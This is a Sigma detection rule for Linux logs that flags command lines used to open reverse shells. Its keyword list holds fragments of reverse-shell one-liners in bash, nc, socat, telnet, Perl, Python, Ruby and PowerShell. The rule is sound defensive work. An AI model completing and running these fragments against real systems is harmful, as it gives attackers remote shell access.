Suspicious Reverse Shell Command Line

 1title: Suspicious Reverse Shell Command Line
 2id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab
 3status: test
 4description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
 5references:
 6    - https://alamot.github.io/reverse_shells/
 7author: Florian Roth (Nextron Systems)
 8date: 2019-04-02
 9modified: 2021-11-27
10tags:
11    - attack.execution
12    - attack.t1059.004
13logsource:
14    product: linux
15detection:
16    keywords:
17        - 'BEGIN {s = "/inet/tcp/0/'
18        - 'bash -i >& /dev/tcp/'
19        - 'bash -i >& /dev/udp/'
20        - 'sh -i >$ /dev/udp/'
21        - 'sh -i >$ /dev/tcp/'
22        - '&& while read line 0<&5; do'
23        - '/bin/bash -c exec 5<>/dev/tcp/'
24        - '/bin/bash -c exec 5<>/dev/udp/'
25        - 'nc -e /bin/sh '
26        - '/bin/sh | nc'
27        - 'rm -f backpipe; mknod /tmp/backpipe p && nc '
28        - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
29        - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
30        - '/bin/sh -i <&3 >&3 2>&3'
31        - 'uname -a; w; id; /bin/bash -i'
32        - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
33        - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'
34        - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
35        - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
36        - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'
37        - 'rm -f /tmp/p; mknod /tmp/p p &&'
38        - ' | /bin/bash | telnet '
39        - ',echo=0,raw tcp-listen:'
40        - 'nc -lvvp '
41        - 'xterm -display 1'
42    condition: keywords
43falsepositives:
44    - Unknown
45level: high